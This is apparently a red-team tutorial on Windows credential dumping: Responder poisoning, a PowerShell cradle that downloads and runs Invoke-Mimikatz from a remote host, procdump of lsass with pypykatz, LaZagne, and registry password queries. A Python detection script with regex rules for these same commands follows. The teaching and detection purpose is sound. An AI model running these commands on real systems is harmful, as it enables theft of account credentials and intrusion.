Red Teaming: Credential dumping techniques
Credential dumping is the technique of obtaining account credentials, either as clear-text passwords or as hashes, from a single computer, a Domain Controller or a piece of software.
LLMNR/NBT-NS Poisoning and Relay
Experts take advantage of the LLMNR and NBT-NS protocols on an internal network to poison and relay authentication requests, obtaining either the users’ hashes or simply a valid connection to a single machine in the context of the user’s session.
A set of tools can be used to reproduce this technique, such as NBNSpoof, Metasploit and Responder. By using the Responder tool, we can get a valid hash for the user: Charlie\John as demonstrated below.
In the next step, the hash can be brute-forced using John the Ripper or hashcat.
After this point, lateral movement, or simply accessing target machines, is possible with the cracked account credentials. On the other hand, if an NTLM hash is retrieved, it can be used directly via a Pass-the-Hash attack on the target to obtain valid access.
Dumping creds using MimiKatz
Mimikatz is a classic tool on the offensive side of cybersecurity, used to obtain clear-text passwords and hashes from memory. It can be executed in different ways, for example through a framework such as Metasploit or Cobalt Strike, or simply via standalone scripts.
Next, we can see a command line responsible for downloading a PowerShell script (Invoke-Mimikatz) and executing it in memory.
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.1/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
This technique can be combined with other obfuscation layers and methods to bypass AV detection on the target machine. More details about this scenario can be found here.
Dumping creds without using MimiKatz
Mimikatz has many known signatures and is often detected by EDRs and AVs. If it is not used properly and with several layers of obfuscation, the TCP connection between the security expert’s computer and the target machine will be terminated, or even blocked by the operating system. In short, this is a preventive mechanism to minimize the risk of compromise, as mimikatz is also a tool widely used by criminals during their malicious operations.
In this sense, if the security expert has RDP access to the target machine, the lsass.exe process can be dumped from the process tree. This process handles user authentication and enforces Windows security policies. There are many ways to do this, including:
- Creating a minidump by using task manager
- Using the legitimate program from Microsoft called procdump.exe:
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
After obtaining a dump of lsass, a Linux version of mimikatz (pypykatz) can be used offline from a Linux machine. The command to retrieve all the passwords and hashes from the lsass dump file is the following:
pypykatz lsa minidump /home/kali/Downloads/lsass.DMP
Getting everything with LaZagne
LaZagne is an open-source project used to retrieve passwords stored locally by many different programs. Since each program stores passwords in its own way (plaintext files, APIs, custom algorithms, etc.), LaZagne is capable of handling these different storage mechanisms and retrieving the passwords of the most commonly used software with a single click.
More details about this tool are available on GitHub.
Credentials available in the Windows Registry
For decades, malware has used this technique to collect passwords from the Windows Registry after an infection. Although most recent programs no longer store their passwords in the Registry, legacy infrastructure still does. In this sense, the following command lines can be a good friend and retrieve a lot of information from the Registry:
reg query HKLM /f password /t REG_SZ /s
# or
reg query HKCU /f password /t REG_SZ /s
Registry queries that include the “/f password” parameter should be monitored and blocked to prevent data exfiltration and thus improve the security posture of the systems.
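As a defender's counterpart to the commands in this article, the following is an added example (not code from the original page) of detection logic in Python that runs over constructed, Sysmon-style process-creation and process-access records and flags the patterns described above: the Invoke-Mimikatz download cradle, a procdump dump of lsass.exe, a non-system process reading lsass memory, and reg query with "/f password". The event shape, field names and the allowlist of legitimate lsass clients are assumptions made for the example and should be tuned to the environment.

```python
import re

# Constructed sample events in a simplified Sysmon-style shape (EventID 1 = process
# creation, EventID 10 = process access). These are made-up records, not real logs.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": "reg query HKLM /f password /t REG_SZ /s"},
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -r -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell IEX (New-Object System.Net.Webclient)"
                    ".DownloadString('http://10.0.0.1/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds"},
    {"EventID": 10, "SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft /v Version"},   # benign query
]

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Command-line patterns, one per technique covered on this page.
CMDLINE_RULES = [
    ("registry_password_search", re.compile(r"\breg(\.exe)?\s+query\b.*\s/f\s+password\b", re.I)),
    ("lsass_dump_cmdline", re.compile(r"lsass(\.exe)?\b.*\.dmp\b|procdump.*lsass", re.I)),
    ("powershell_download_cradle", re.compile(r"\bIEX\b.*DownloadString\(", re.I)),
    ("mimikatz_invocation", re.compile(r"Invoke-Mimikatz|-DumpCreds", re.I)),
]

# Assumed allowlist of processes that legitimately open lsass on a stock Windows host.
LSASS_ACCESS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}


def detect(events):
    """Return (rule_name, detail) pairs for every event matching a credential-dumping rule."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            cmd = ev.get("CommandLine", "")
            for name, pattern in CMDLINE_RULES:
                if pattern.search(cmd):
                    alerts.append((name, cmd))
        elif ev.get("EventID") == 10:
            target = ev.get("TargetImage", "").rsplit("\\", 1)[-1].lower()
            source = ev.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
            mask = int(ev.get("GrantedAccess", "0x0"), 16)
            # Only memory-read access to lsass from a non-allowlisted process is alerted on.
            if target == "lsass.exe" and mask & PROCESS_VM_READ and source not in LSASS_ACCESS_ALLOWLIST:
                alerts.append(("lsass_memory_read", f"{source} -> lsass.exe ({hex(mask)})"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The benign reg query and the csrss.exe access to lsass (no PROCESS_VM_READ bit) produce no alert, while the four dumping patterns each produce one.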
Sources:
- LaZagne project, GitHub
- PypyKatz - Linux version of mimikatz, GitBook - Segurança Informática
- Dumping creds from memory, IredTeam
- LLMNR/NBT-NS Poisoning and Relay, Red Team Notes